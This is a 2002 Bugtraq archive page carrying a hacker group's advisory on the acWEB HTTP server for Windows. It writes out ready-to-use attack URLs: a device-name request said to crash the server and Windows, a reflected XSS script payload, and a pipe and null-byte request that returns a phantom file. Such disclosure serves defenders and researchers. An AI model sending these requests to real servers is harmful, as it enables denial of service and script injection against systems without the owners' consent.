Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

IIL Advisory: Vulnerabilities in acWEB HTTP server

From: DownBload <downbload () hotmail com>
Date: 25 Sep 2002 09:08:20 -0000



                    [ Illegal Instruction Labs Advisory ]
[-------------------------------------------------------------------------]
Advisory name: Vulnerabilities in acWEB HTTP server
Advisory number: 13
Application: acWEB HTTP server
Author e-mail: spf () users sourceforge net
Homepage: somewhere on sourceforge
Date: 10.09.2002
Impact: DoS, XSS, etc.
Tested on: Windows 98
Discovered by: DownBload                                                
Mail me @: downbload () hotmail com     




======[ Overview 

Sourceforge: "acWEB is an OpenSource replacement for MS IIS and other 
proprietary WEB servers for Windows. Unlike IIS, acWEB is not affected by 
viruses like CodeRed, Nimda, etc :)."

/ME says: acWEB is simple HTTP server for Windows. It is perfect for tiny 
companies, and for home use.




======[ Problem(s)      

===[ Remote DoS
First vulnerability which I discovered in acWEB HTTP server was remote DoS.
It is possible to crush acWEB (and Windows too) with simple HTTP request:
---cut here---
http://www.victim.com/com2.bat 
---cut here---


===[ XSS a.k.a CSS bug
XSS code execution:
---cut here---
http://www.victim.com/%db&lt;script&gt;alert('Illegal%20Instruction%20Labs%
200wnz%20YoU!!!');&lt;/script&gt;/
---cut here---


===[ Fake file download
---cut here---
http://www.victim.com/|%5chacked.txt%00
---cut here---

When this request it sent to acWEB HTTP server, acWEB will return:
---------------
HTTP/1.0 200 OK
Content-Length: 0
Connection: Close
Content-Type: application/octet-stream
Server: Eserv/3.x

---------------
That is fuqn weird, because file 'hacked.txt' don't exist. acWEB HTTP 
server will
send us 'hacked.txt' empty file to download. 




======[ Exploit

This can be exploited with browser, so I won't write exploit for this...or 
maybe one day :).




======[ Greetz 

Greetz goes to #hr.hackers, #ii-labs and #linux <irc.carnet.hr>. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
Fr1c, phreax, LekaMan, StYx, harlequin, Astral and www.active-security.org 
(NetZero & Paradox). I'm very sorry if I forgot someone.
Previous By Date Next
Previous By Thread Next

Current thread: